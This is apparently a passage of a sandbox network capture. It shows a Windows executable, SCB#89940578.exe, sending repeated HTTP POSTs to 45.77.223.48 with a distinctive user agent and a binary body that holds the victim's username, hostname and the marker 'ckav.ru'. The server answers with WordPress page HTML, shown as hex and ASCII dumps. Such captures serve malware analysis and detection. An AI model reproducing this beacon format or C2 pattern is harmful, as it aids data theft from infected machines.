Apr 26, 2024 04:42:28.809453964 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:28.829871893 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:28.831037045 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:28.831212044 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:28.831322908 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:28.831470013 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:28.831548929 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49759	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:29.146660089 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:29.335643053 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:30.546466112 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:29 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:30.546561956 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:30.546730995 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:30.567848921 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:30.568367958 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:30.568507910 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:30.568613052 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:30.568639040 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:30.568675995 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:30.735337973 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49760	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:30.890482903 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:31.079432964 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:31.972002983 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:30 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:31.972035885 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:31.972186089 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:31.980283022 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:31.980451107 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:31.980593920 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:31.980775118 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:31.980952024 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:31.981331110 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:31.981400013 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49761	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:32.693378925 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:32.881728888 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:33.827434063 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:32 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:33.827451944 CEST	70	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 26, 2024 04:42:33.827575922 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:33.835581064 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:33.835835934 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:33.835848093 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:33.835978031 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:33.836019039 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:33.836107969 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:33.836121082 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49762	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:34.173942089 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:34.363003969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:35.261075974 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:34 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:35.261209965 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:35.261291027 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:35.274274111 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:35.274288893 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:35.274300098 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:35.274310112 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:35.274322987 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:35.274430037 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:35.274444103 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49763	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
